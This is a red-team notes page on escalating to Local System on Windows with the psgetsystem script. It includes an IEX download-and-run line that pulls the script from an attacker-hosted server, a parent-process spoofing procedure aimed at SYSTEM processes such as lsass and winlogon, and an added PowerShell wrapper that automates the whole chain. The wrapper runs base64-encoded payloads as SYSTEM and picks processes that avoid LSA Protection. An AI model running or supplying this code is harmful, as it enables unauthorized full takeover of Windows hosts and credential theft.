Theory
RCE as Local System
PSGetSystem
Setup
- From the Attacker
curl --silent --location --request GET "https://github.com/decoder-it/psgetsystem/raw/refs/heads/master/psgetsys.ps1" --remote-name
python3 -m http.server 80
- From the Target
IEX (New-Object Net.WebClient).downloadString('http://<ATTACKER>/psgetsys.ps1')
Process PID as Local System
Once the script's functions have been imported into the current PowerShell session, we need the PID of a process running as Local System (NT AUTHORITY\SYSTEM)
A non-privileged account usually cannot query the owner of every process (the handle open for the owner lookup is denied), so enumerating processes by owner is unreliable
However, several well-known Windows processes always run as Local System, such as lsass, winlogon and services
Therefore, we simply look one of them up by name to obtain its PID
( Get-Process | ? { $_.ProcessName -eq '<PROCESS_NAME>' } ).Id
e.g.
( Get-Process | ? { $_.ProcessName -eq 'lsass' } ).Id
Command Execution
With the required PID, we can run the command below to spawn a new process whose parent is the chosen SYSTEM process; the child inherits the parent's primary token and therefore runs as Local System
Remember that SeDebugPrivilege allows a process such as cmd.exe or powershell.exe to open any non-protected process regardless of its DACL (this is what lets a debugger read and write another process's memory)
Here that right is used to obtain a handle with PROCESS_CREATE_PROCESS access to the SYSTEM process, which is what the parent-process attribute of CreateProcess requires
Caveat: if lsass runs as a protected process (LSA Protection / RunAsPPL), the handle open fails even with SeDebugPrivilege, so pick another Local System process such as winlogon
ImpersonateFromParentPid -ppid <PARENT_PID> -command "<COMMAND>" -cmdargs "<COMMAND_ARGS>"
e.g.
ImpersonateFromParentPid -ppid <PARENT_PID> -command "C:\Windows\System32\cmd.exe" -cmdargs "/c powershell.exe -EncodedCommand <BASE64_STRING>"
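The whole procedure above (privilege check, PID lookup, command execution and proof) put together in one PowerShell wrapper. This is an added example, not code from the original page or from the psgetsystem project; it assumes psgetsys.ps1 has already been loaded into the session with the IEX line from the Setup step and that it exposes ImpersonateFromParentPid with the -ppid, -command and -cmdargs parameters shown above. The helper names (Test-SeDebugPrivilege, Get-SystemParentPid, Invoke-AsSystem) and the output path are assumptions chosen for this example.

```powershell
# Added example, not part of psgetsys.ps1. Assumes psgetsys.ps1 is already
# imported in this session (IEX ... psgetsys.ps1) so that
# ImpersonateFromParentPid -ppid/-command/-cmdargs is available.

function Test-SeDebugPrivilege {
    # whoami /priv lists every privilege held by the token, Enabled or Disabled.
    # If SeDebugPrivilege is absent entirely, no SYSTEM process can be opened.
    # (Assumption: the imported script takes care of enabling it if Disabled.)
    return [bool]((whoami /priv) | Select-String -SimpleMatch 'SeDebugPrivilege')
}

function Get-SystemParentPid {
    param(
        # Processes that always run as NT AUTHORITY\SYSTEM, in order of preference.
        # lsass is last: under LSA Protection (RunAsPPL) it is a protected process and
        # cannot be opened with PROCESS_CREATE_PROCESS, even with SeDebugPrivilege.
        [string[]]$Candidates = @('winlogon', 'services', 'lsass')
    )
    foreach ($name in $Candidates) {
        $proc = Get-Process -Name $name -ErrorAction SilentlyContinue | Select-Object -First 1
        if (-not $proc) { continue }

        # Where the owner query is permitted, verify it really is SYSTEM; where it is
        # denied (typical for a non-privileged caller), fall back to the well-known name.
        try {
            $cim   = Get-CimInstance Win32_Process -Filter "ProcessId = $($proc.Id)"
            $owner = Invoke-CimMethod -InputObject $cim -MethodName GetOwner
            if ($owner.ReturnValue -eq 0 -and $owner.User -ne 'SYSTEM') { continue }
        } catch { }
        return $proc.Id
    }
    throw 'No usable Local System parent process found'
}

function Invoke-AsSystem {
    param([Parameter(Mandatory)][string]$Script)

    if (-not (Test-SeDebugPrivilege)) {
        throw 'SeDebugPrivilege is not held by this token; run from an elevated administrator context'
    }
    $parentPid = Get-SystemParentPid

    # -EncodedCommand expects base64 of UTF-16LE; encoding also keeps the payload's
    # quoting intact across the cmd.exe -> powershell.exe hop.
    $encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($Script))

    ImpersonateFromParentPid -ppid $parentPid `
        -command 'C:\Windows\System32\cmd.exe' `
        -cmdargs "/c powershell.exe -NoProfile -EncodedCommand $encoded"
}

# Proof of success: the child spawned under the SYSTEM parent writes its identity
# to a file (path is an assumption for this example), which should read NT AUTHORITY\SYSTEM.
Invoke-AsSystem -Script 'whoami > C:\Windows\Temp\whoami_system.txt'
Start-Sleep -Seconds 2
Get-Content C:\Windows\Temp\whoami_system.txt
```

The candidate order deliberately puts winlogon and services before lsass so the wrapper keeps working on hosts with LSA Protection enabled; the owner check is best-effort only, because an unprivileged caller is usually denied the handle needed for GetOwner, which is exactly why the page relies on well-known process names in the first place.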
LSASS Dump
See here for memory data exfiltration on Windows